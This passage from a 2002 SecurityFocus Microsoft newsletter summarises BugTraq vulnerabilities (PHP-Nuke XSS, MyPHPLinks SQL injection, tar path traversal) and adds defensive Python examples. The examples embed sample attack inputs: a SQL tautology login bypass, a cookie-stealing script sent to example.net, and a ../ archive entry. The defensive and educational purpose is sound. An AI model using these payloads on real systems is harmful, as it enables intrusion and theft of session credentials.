command to exploit this issue, so having access to a valid database user
account may be a prerequisite for exploitation. It is not known if this
condition exists when an unauthenticated user attempts to authenticate
normally.
This condition may not be exploitable on Microsoft Windows platforms due
to the random number generator for the password verification algorithm
using a limited character set.
23. Microsoft Java Virtual Machine URL Parsing Vulnerability
BugTraq ID: 6377
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6377
Summary:
The Microsoft JVM implements the Java runtime environment for Microsoft
Internet Explorer. A vulnerability has been discovered in the Microsoft
Java Virtual Machine.
This vulnerability is due to a flaw in the way the JVM parses URLs. This
vulnerability may allow an attacker to construct a malicious URL that
would load a Java applet from an attacker's site but misrepresent it as
belonging to another, trusted, site.
An attacker can exploit this vulnerability to trick a user into executing
a malicious applet to intercept any traffic that the user would send to a
trusted site. Such information could include personal information or even
credit card details; an attacker could potentially obtain any information
the user is willing to divulge to the site from which the malicious applet
appears to originate. This vulnerability could also be used to steal
cookie based credentials.
This vulnerability was originally described in BID 6365. It is now being
assigned its own BugTraq ID.
24. Microsoft Java Virtual Machine JDBC API Access Vulnerability
BugTraq ID: 6379
Remote: Yes
Date Published: Dec 12 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6379
Summary:
The Microsoft JVM implements the Java runtime environment for Microsoft
Internet Explorer. A vulnerability has been discovered in the Microsoft
Java Virtual Machine (JVM).
The vulnerability is due to insufficient security checks performed by the
JVM on JDBC (Java Database Connectivity) API access by remote applets. The
JDBC APIs are a set of functions that allow Java applets to access
databases on systems.
Only trusted Java applets should be able to access these APIs; however, an
attacker may be able to create an applet that can bypass the existing
security checks performed by the JVM to access the APIs. This will allow
an attacker to access databases with the privileges of another user to
manipulate the contents of databases accessible by the user.
This vulnerability was originally described in BID 6365. It is now being
assigned its own BugTraq ID.
25. PHP-Nuke 6.0 Multiple Cross Site Scripting Vulnerabilities
BugTraq ID: 6409
Remote: Yes
Date Published: Dec 16 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6409
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is available
for a range of systems, including Unix, Linux, and Microsoft Windows.
Cross-site scripting vulnerabilities have been discovered in multiple PHP
scripts used by PHP-Nuke 6. Due to insufficient sanitization of web
requests it is possible for script code to be embedded in PHP script
requests.
The scripts vulnerable to these issues include
'bb_smilies.php', 'bbcode_ref.php', 'editpost.php', 'newtopic.php',
'reply.php', 'topicadmin.php', 'viewforum.php', and 'searchbb.php'.
By constructing a malicious link which exploits one of these
vulnerabilities, it may be possible to execute arbitrary code within the
context of a website visited by an unsuspecting user. This may allow a
remote attacker to steal cookie-based authentication credentials, which
could be used at a later time to hijack a user's web session.
26. Symantec Enterprise Firewall RealAudio Proxy Buffer Overflow Vulnerability
BugTraq ID: 6389
Remote: Yes
Date Published: Dec 13 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6389
Summary:
Raptor Firewall is an enterprise level firewall originally developed by
Axent Technologies and is maintained and distributed by Symantec. Symantec
Enterprise Firewall is formerly known as Raptor firewall. It is available
for Microsoft Windows and Unix operating systems.
A vulnerability has been reported for Symantec Enterprise Firewall. A
buffer overflow vulnerability occurs in the RealAudio Proxy installed on
Symantec Enterprise Firewall. Reportedly, when the Proxy process is sent a
specially formatted stream of data, a buffer overflow condition is
triggered. This will cause the rad (RealAudio) and statsd (statistics)
services to terminate unexpectedly and produce Dr. Watson logs.
The vulnerability occurs when the RealAudio Proxy receives packets that do
not follow the RealAudio Protocol. An attacker can exploit this
vulnerability and send a specially crafted stream of data to the Proxy
process. This will cause a local buffer to be overrun with attacker-supplied
values, triggering the buffer overflow condition. This will
cause the rad and statsd services to terminate resulting in a denial of
service condition.
Although unconfirmed, it may be possible for an attacker to gain control
over the execution of the vulnerable RealAudio Proxy process.
27. MyPHPSoft MyPHPLinks SQL Injection Administration Bypassing Vulnerability
BugTraq ID: 6395
Remote: Yes
Date Published: Dec 14 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6395
Summary:
MyPHPLinks is a freely available, open source PHP application distributed
by MyPHPSoft. It is available for Unix, Linux, and Microsoft Windows
operating systems.
A problem with MyPHPLinks could allow remote attackers unauthorized access
to system resources.
It has been reported that a problem with the checking of input by
MyPHPLinks exists. A problem in the checking of the idsession variable
used by MyPHPLinks to verify Administrator access may allow a remote user
to gain access to the host. This problem could allow an attacker to gain
administrator access to the MyPHPLinks section of a web site.
This vulnerability may be exploited by passing a SQL statement through the
idsession variable. This SQL statement must evaluate to true.
Exploitation of this vulnerability would allow an attacker to change the
links indexed in a MyPHPLinks installation.
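The idsession check described above is the classic string-splicing defect: a request value that makes the WHERE clause evaluate to true is accepted as a valid administrator session. The following is an added example, not MyPHPLinks code; the table name, column and session value are constructed stand-ins, and sqlite3 is used in place of the application's real database so the comparison runs offline. It shows the vulnerable query shape beside the parameterized form that compares the value as data.

```python
import sqlite3

# Constructed in-memory stand-in for the table MyPHPLinks consults when it
# checks the idsession value (hypothetical schema; the real one is not on the page).
VALID_SESSION = "7f3a9c0d1e2b"  # constructed sample value

def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin_sessions (idsession TEXT PRIMARY KEY)")
    db.execute("INSERT INTO admin_sessions VALUES (?)", (VALID_SESSION,))
    return db

def is_admin_vulnerable(db: sqlite3.Connection, idsession: str) -> bool:
    # Defect pattern: the request value is spliced into the SQL text, so a value
    # containing a quote and an OR clause rewrites the WHERE condition itself.
    sql = "SELECT COUNT(*) FROM admin_sessions WHERE idsession = '%s'" % idsession
    return db.execute(sql).fetchone()[0] > 0

def is_admin_fixed(db: sqlite3.Connection, idsession: str) -> bool:
    # Parameter binding sends the value separately from the statement, so it is
    # compared as data and can never change the shape of the query.
    sql = "SELECT COUNT(*) FROM admin_sessions WHERE idsession = ?"
    return db.execute(sql, (idsession,)).fetchone()[0] > 0

# Constructed request value that always evaluates to true when spliced in
TAUTOLOGY = "' OR '1'='1"

def compare(idsession: str) -> dict:
    """Run both checks on the same input for a side-by-side comparison."""
    db = make_db()
    return {"vulnerable": is_admin_vulnerable(db, idsession),
            "fixed": is_admin_fixed(db, idsession)}

if __name__ == "__main__":
    for value in (VALID_SESSION, TAUTOLOGY, "nosuchsession"):
        print(repr(value), compare(value))
```

The fixed version also covers the case the page leaves open, since whatever the idsession variable holds it is only ever matched against stored session identifiers, never interpreted as SQL.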
28. Cypherix Cryptainer Information Disclosure Vulnerability
BugTraq ID: 6396
Remote: No
Date Published: Dec 16 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6396
Summary:
Cypherix Cryptainer is data encryption software designed for use with
Microsoft Windows operating systems.
A vulnerability has been reported for Cryptainer that may allow attackers
to obtain access to the passwords used by Cryptainer. The vulnerability
exists due to the way Cryptainer stores the user-supplied password to
access the program. Specifically, Cryptainer stores the password in memory
in clear text.
This vulnerability can only be exploited when Cryptainer is loaded and the
victim user has entered the password at least once. However, Cryptainer
contains a feature that allows the program to be minimized in the System
Tray. This satisfies one condition of exploitation and may provide local
attackers with a greater chance for exploitation.
By exploiting this issue, a malicious local user may be able to retrieve
sensitive information from a system using Cryptainer, which may lead to the
compromise of computing resources.
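The weakness above is a password held in clear text for as long as the program stays loaded. The mitigation pattern is to keep the passphrase only in a buffer that can be overwritten in place, derive the working key from it as early as possible, and wipe the passphrase immediately afterwards so that a minimized or idle process no longer holds it. The following is an added example in Python, not Cryptainer's code; the PBKDF2 parameters and the salt are constructed for the demonstration.

```python
import hashlib

class PassphraseBuffer:
    """Keeps a passphrase in a mutable bytearray so it can be overwritten in place.

    A Python str or bytes object is immutable and retains its contents until the
    interpreter frees it, which mirrors the failure mode in the Cryptainer report:
    the clear-text password stays resident while the program is loaded.
    """

    def __init__(self, passphrase: bytes):
        self._buf = bytearray(passphrase)

    def derive_key(self, salt: bytes, iterations: int = 100_000) -> bytes:
        # Derive the working key and wipe the passphrase straight away; only the
        # derived key needs to stay resident while the container is open.
        # The bytearray is passed directly so no immutable copy is made here.
        key = hashlib.pbkdf2_hmac("sha256", self._buf, salt, iterations)
        self.wipe()
        return key

    def wipe(self) -> None:
        # Byte-by-byte assignment writes into the existing storage; slicing or
        # rebinding would leave the old contents behind in a discarded object.
        for i in range(len(self._buf)):
            self._buf[i] = 0

    def is_wiped(self) -> bool:
        return all(b == 0 for b in self._buf)

if __name__ == "__main__":
    salt = b"\x01" * 16  # constructed; a real application stores a random salt
    pb = PassphraseBuffer(b"correct horse")
    key = pb.derive_key(salt, 1000)
    print("key:", key.hex())
    print("passphrase wiped:", pb.is_wiped())
```

This does not guarantee that no copy exists elsewhere (the GUI toolkit that collected the keystrokes may keep its own), but it removes the long-lived clear-text copy that the report describes and limits exposure to the short window between entry and key derivation.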
29. PHP-Nuke Web Mail Script Injection Vulnerability
BugTraq ID: 6400
Remote: Yes
Date Published: Dec 16 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6400
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is available
for a range of systems, including Unix, Linux, and Microsoft Windows.
A vulnerability has been discovered in the web mail module available for
PHP-Nuke. Due to insufficient sanitization of message content it is
possible for an attacker to embed script code into a malicious HTML email.
An unsuspecting user that opens the email will cause the script code to be
executed within their browser.
Exploiting this issue may allow an attacker to steal cookie-based
authentication credentials, which may be used at a later time to hijack a
user's web session.
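Both PHP-Nuke issues above (BID 6409 in the forum scripts and BID 6400 in the web mail module) come down to message or request content being written into a page without encoding. The following is an added example in Python, not PHP-Nuke code, of the output-encoding step that closes the gap when the content is rendered as text; the sample message is constructed, and `SAFE_LINK_SCHEMES` is an assumed allowlist. It also shows why attribute escaping alone is not enough for links: a `javascript:` URL survives escaping untouched, so the scheme has to be checked separately.

```python
import html
from urllib.parse import urlsplit

# Assumed allowlist of schemes a rendered link may carry; anything else
# (javascript:, data:, vbscript:) is replaced, because escaping does not
# stop such a URL from executing when the link is followed.
SAFE_LINK_SCHEMES = {"http", "https", "mailto"}

def escape_text(s: str) -> str:
    """Encode user-supplied text for an HTML text node or attribute value."""
    return html.escape(s, quote=True)

def render_link(href: str, label: str) -> str:
    """Render an anchor whose href and label both came from the message."""
    scheme = urlsplit(href.strip()).scheme.lower()
    if scheme not in SAFE_LINK_SCHEMES:
        href = "#"
    return '<a href="%s">%s</a>' % (escape_text(href), escape_text(label))

def render_message(sender: str, subject: str, body: str) -> str:
    """Build the HTML a webmail page would show for one message."""
    return (
        '<div class="msg">'
        "<p>From: %s</p><p>Subject: %s</p><pre>%s</pre>"
        "</div>" % (escape_text(sender), escape_text(subject), escape_text(body))
    )

# Constructed sample message whose subject and body carry markup
SAMPLE = {
    "sender": "alice@example.com",
    "subject": "Hi <b>there</b>",
    "body": 'see <script>document.location="http://example.net/?"+document.cookie</script>',
}

if __name__ == "__main__":
    print(render_message(**SAMPLE))
    print(render_link("javascript:alert(1)", "click"))
```

Escaping everything is the right choice for plain-text mail and for request parameters echoed back to the user; a module that must display HTML mail bodies needs an allowlist-based sanitizer on top of this, which is a larger component than the encoding shown here.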
30. PHP-Nuke Multiple Path Disclosure Vulnerabilities
BugTraq ID: 6406
Remote: Yes
Date Published: Dec 16 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6406
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is available
for a range of systems, including Unix, Linux, and Microsoft Windows.
Multiple path disclosure vulnerabilities have been discovered in PHP
scripts used by PHP-Nuke. The issue occurs when a request is made for a
script, which should not be accessed directly. Some scripts do not provide
sufficient error handling for cases where these scripts are accessed
directly. This will cause the script to generate an error page containing
the absolute path information. The PHP scripts affected by this issue
include voteinclude.php, navbar.php, attachment.php, and mainfile.php.
Exploiting this issue will cause the target server to disclose sensitive
information about the layout of the filesystem of the host running the
vulnerable software. Information of this nature may aid in mounting
further attacks against the host.
31. ZipMagic Tar Hostile Destination Path Vulnerability
BugTraq ID: 6416
Remote: Yes
Date Published: Dec 17 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6416
Summary:
ZipMagic is a file compression utility available from Aladdin Systems. It
is available for the Microsoft Windows operating system.
A vulnerability has been discovered in Aladdin Systems ZipMagic when
handling malicious .tar archives. The problem lies in the handling of
pathnames.
By specifying a path for an archived item which points outside the
expected directory scope, the creator of the archive can cause the file to
be extracted to arbitrary locations on the filesystem. An attacker may
take advantage of this vulnerability to cause malicious files to be placed
anywhere on a target filesystem.
An attacker may exploit this condition by specifying a relative extraction
path in a malicious .tar that points to sensitive or critical files, such
as system binaries.
This vulnerability was originally described in BID 6412 "Multiple Vendor
Archiving Software Tar Hostile Destination Path Vulnerability" and is now
being assigned an individual Bugtraq ID.
32. WinZip Tar Hostile Destination Path Vulnerability
BugTraq ID: 6418
Remote: Yes
Date Published: Dec 17 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6418
Summary:
WinZip is an archiving utility for Microsoft Windows platforms.
WinZip is prone to a security vulnerability when unpacking .tar archives.
The problem is in the handling of pathnames.
By specifying a path for an archived item which points outside the
expected directory scope, the creator of the archive can cause the file to
be extracted to arbitrary locations on the filesystem. An attacker may
take advantage of this vulnerability to cause malicious files to be placed
anywhere on a target filesystem.
This issue is present when the "Extract folder names" option is checked in
the extraction dialogue, which is the default setting and is used to
retain the directory structure when extracting files. An attacker may
exploit this condition by specifying a relative extraction path in a
malicious .tar that points to sensitive or critical files, such as system
binaries.
This vulnerability was originally described in BID 6412 "Multiple Vendor
Archiving Software Tar Hostile Destination Path Vulnerability" and is now
being assigned an individual Bugtraq ID.
33. WinRAR Archive Improper File Representation Weakness
BugTraq ID: 6422
Remote: Yes
Date Published: Dec 17 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6422
Summary:
WinRAR is a compression utility capable of reading and writing files using
ZIP, RAR, CAB, ARJ, LZH, TAR, GZ, ACE, UUE, BZ2, JAR, and ISO archives. It
is available for the Microsoft Windows Operating system.
WinRAR contains a weakness when displaying the directory traversal
sequence '../' to the user when contained in .tar archives. Instead of
displaying the '../' sequence, the user interface will display '..'.
This could allow a user viewing a .tar archive to believe that the
extraction path information contained in the archive is legitimate and can
be redistributed to other users.
Passing along such an archive could allow another user to be exploited if
their archive extraction utility is vulnerable to the Multiple Vendor
Archiving Software Tar Hostile Destination Path Vulnerability (BID 6412).
This issue was originally mentioned in BID 6412 and is now being assigned
an individual Bugtraq ID.
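The three archive issues above (ZipMagic and WinZip extracting to a path chosen by the archive's creator, and WinRAR showing '..' where the entry name actually contains '../') all turn on the raw entry name stored in the tar header. The following is an added example, not code from any of these products, of the check an extractor or a pre-extraction audit should apply: normalize each entry name and reject anything absolute, drive-qualified, or climbing above the extraction directory. The sample archive is constructed in memory so the check runs offline, and the check works on the stored name, not on whatever a user interface chooses to display.

```python
import io
import posixpath
import tarfile

def is_safe_member(name: str) -> bool:
    """True if an archive entry name stays inside the extraction directory."""
    if not name:
        return False
    name = name.replace("\\", "/")          # Windows extractors treat both separators alike
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        return False                          # absolute path or drive letter
    norm = posixpath.normpath(name)           # collapses 'a/../../b' to '../b'
    return norm != ".." and not norm.startswith("../")

def audit_archive(data: bytes):
    """Classify every entry of a tar archive without extracting anything."""
    safe, rejected = [], []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for member in tf.getmembers():
            (safe if is_safe_member(member.name) else rejected).append(member.name)
    return safe, rejected

def build_sample_archive() -> bytes:
    """Constructed demo archive: one ordinary entry and one whose stored name
    climbs out of the extraction directory with '../' components."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, payload in [("docs/readme.txt", b"hello"),
                              ("../../outside/escaped.txt", b"should not land here")]:
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()

if __name__ == "__main__":
    ok, bad = audit_archive(build_sample_archive())
    print("safe:", ok)
    print("rejected:", bad)
```

Normalizing before the check matters because a name such as `docs/../../x` contains no leading `../` yet still escapes; `posixpath.normpath` reduces it to `../x` first. Python's own tarfile gained the same protection at extraction time in 3.12 through `extractall(filter="data")`, which refuses such names rather than silently writing outside the target directory.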
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Removing locking user from CTRL-ALT-DEL window - NT 4.0 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/304088
2. Logging Terminal Services Access? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/304089
3. ipsecpol on Windows 2000 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/304087
4. SecurityFocus Microsoft Newsletter #117 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/303553
5. Users Peeved at Microsoft Security Effort (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/303529
6. IIS 4 Security (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/303338
7. Exchange 5.5 delivery receipts (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/303328
8. Bulletin MS02-069 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/303278
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. ipPulse
by Northwest Performance Software
Platforms: Windows 95/98, Windows NT
Relevant URL:
http://www.ippulse.com/ippulsemain.html
Summary:
ipPulse is a Remote Status Monitoring Tool. Use ipPulse to monitor the
up/down status of IP connected devices (nodes) on any IP connected
network. ipPulse uses a variety of methods, including SNMP, to poll and
check the network connectivity of a list of user-defined nodes. ipPulse
alerts you to failures using a variety of techniques ranging from audible
messages to email and pager notification. You can even control ipPulse
remotely by logging into Remote Control using any Telnet application.
2. BVRP Mail Warden
by BVRP Software UK
Platforms: Windows 2000, Windows NT
Relevant URL:
http://shop.bvrp.com/english/asp/default.asp?UserPrefLanguage=1&UserPrefCountry=3&UserPrefCurrency=4&UserPrefCurrentCompany=18&UserPrefUseVicom=1
Summary:
BVRP Mail Warden provides vital email protection for your business against
unwanted, dangerous or inappropriate email messages flowing in and out of
your organisation.
3. Silent Watch
by Adavi
Platforms: Windows 95/98, Windows NT
Relevant URL:
http://www.adavi.com/overview.cfm
Summary:
Desktop PC surveillance software: monitor displays, keystroke logs and URL
logs, define a keyword dictionary to trigger alarms, and monitor hundreds of
PCs remotely. Freeze PCs and block keyword-trapped email and file transfers.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
-------------------------------------
1. Lepton's Crack v1.0.1
by Lepton and Nekromancer lcrack@eudoramail.com
Relevant URL:
http://usuarios.lycos.es/reinob/
Platforms: Linux, POSIX, Windows 2000, Windows NT
Summary:
Lepton's Crack is a generic password cracker. It is easily customizable
with a simple plugin system and allows system administrators to review the
quality of the passwords being used on their systems. It can perform a
dictionary-based (wordlist) attack as well as a brute force (incremental)
password scan. It supports standard MD4 hash, standard MD5 hash, NT
MD4/Unicode, and Lotus Domino HTTP password (R4) formats.
2. perltrash v0.3
by Maik Schreiber
Relevant URL:
http://www.iq-computing.de/perltrash
Platforms: Os Independent
Summary:
perltrash is a Perl script that emulates a "trash can". Instead of
permanently deleting files, they are moved into the trash can. Files can
be restored in the future if they are needed again. Single files can be
permanently removed from the trash can. perltrash can automatically remove
files from the trash can that are over a certain time limit or trash can
size. It supports all kinds of files, including complete directories.
3. Opticon|Users 2002
by Security Storm
Relevant URL:
http://www.securitystorm.net/products/tools/opticon/index.asp
Platforms: Windows 2000, Windows NT, Windows XP
Summary:
Opticon|Users 2002 is a simple tool to show administrators who is logged
onto the network and from what workstation that user is accessing the
network from. Information about the workstation used to logon from, the
domain, the logon server, and the date/time of logon is also displayed.
This tool makes it easy to spot unauthorized logons from a certain
workstation or logons using an administrative account.
VI. SPONSOR INFORMATION
-----------------------
This issue is sponsored by: Qualys
Strengthening Network Security: FREE Guide Network security is a
constantly moving target - even proven solutions lose their punch over
time. Find out how to get COMPLETE PROTECTION against ever-growing
security threats with our FREE new Guide.
Get your copy today at: https://www.qualys.com/forms/nsguideh_376.php
-------------------------------------------------------------------------------